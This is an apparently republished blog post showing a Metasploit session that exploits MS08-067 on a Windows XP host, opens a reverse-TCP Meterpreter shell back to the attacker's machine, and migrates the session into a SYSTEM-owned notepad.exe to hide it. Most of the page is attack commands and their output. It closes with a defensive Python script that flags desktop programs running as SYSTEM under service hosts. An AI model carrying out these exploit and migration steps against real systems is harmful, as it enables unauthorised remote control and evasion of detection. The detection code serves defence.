Process migration in Metasploit
Source: Internet  Editor: 程序博客网  Time: 2024/05/20 06:31
```
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > set TARGET 41
TARGET => 41
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.11:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 2 opened (192.168.1.11:4444 -> 192.168.1.142:1083) at 2013-04-27 13:15:56 -0400

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
 264   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 436   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe
 564   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 636   564   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 660   564   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 880   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 924   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 1004  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1124  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1212  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1292  1536  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe
 1340  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1488  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1596  1536  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
 1672  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 1700  1596  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1708  1596  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1772  1596  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2024  1124  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter > run post/windows/manage/migrate

[*] Running module against ROOT-9743DD32E3
[*] Current server process: svchost.exe (1124)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1612
[+] Successfully migrated to process 1612

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
 264   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 436   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe
 564   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 636   564   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 660   564   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 880   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 924   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 1004  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1124  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1212  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1292  1536  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe
 1340  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1488  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1596  1536  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
 1612  1124  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
 1672  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 1700  1596  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1708  1596  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1772  1596  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2024  1124  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter >
```
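Before the migration there was no notepad.exe process; after the migration there is one. On XP, however, it can only be seen through Task Manager.
When Notepad is opened by the administrator, it looks like this:
The only difference is the user name: SYSTEM versus Administrator.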
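The difference noted above is what a defender can key on: a desktop program such as notepad.exe running as SYSTEM under a service host instead of under explorer.exe. The following is an added example, not part of the original post; the sample rows are constructed in the shape of the `ps` output (PID 3000 is invented), and the `DESKTOP_APPS` and `SERVICE_HOSTS` lists are assumptions.

```python
import re

# Constructed sample in the shape of the `ps` output above. PID 1612 is the
# row from the page; PID 3000 is a constructed Notepad started from the desktop.
SAMPLE_PS = r"""
 704   660   services.exe  x86  0  NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 1124  704   svchost.exe   x86  0  NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1596  1536  explorer.exe  x86  0  ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
 1612  1124  notepad.exe   x86  0  NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
 3000  1596  notepad.exe   x86  0  ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\notepad.exe
"""

# Assumed lists for this sketch; tune them to the environment being monitored.
DESKTOP_APPS = {"notepad.exe", "calc.exe", "mspaint.exe"}
SERVICE_HOSTS = {"svchost.exe", "services.exe", "spoolsv.exe", "lsass.exe"}


def parse_ps(text):
    """Parse rows of PID, PPID, Name, Arch, Session, User, Path (2+ spaces apart)."""
    procs = {}
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 6 or not cols[0].isdigit():
            continue  # header, separator, or a row without a user column
        pid, ppid, name, _arch, _session, user = cols[:6]
        procs[int(pid)] = {"ppid": int(ppid), "name": name.lower(), "user": user.upper()}
    return procs


def find_suspicious(text):
    """Return (pid, reasons) for desktop apps that look service-spawned."""
    procs = parse_ps(text)
    findings = []
    for pid, p in procs.items():
        if p["name"] not in DESKTOP_APPS:
            continue
        reasons = []
        if p["user"] == r"NT AUTHORITY\SYSTEM":
            reasons.append("runs as SYSTEM")
        parent = procs.get(p["ppid"])
        if parent and parent["name"] in SERVICE_HOSTS:
            reasons.append("parent is " + parent["name"])
        if reasons:
            findings.append((pid, reasons))
    return findings


if __name__ == "__main__":
    print(find_suspicious(SAMPLE_PS))
```

On the sample, only PID 1612 is reported; the Notepad started from the desktop (parent explorer.exe, user Administrator) is not.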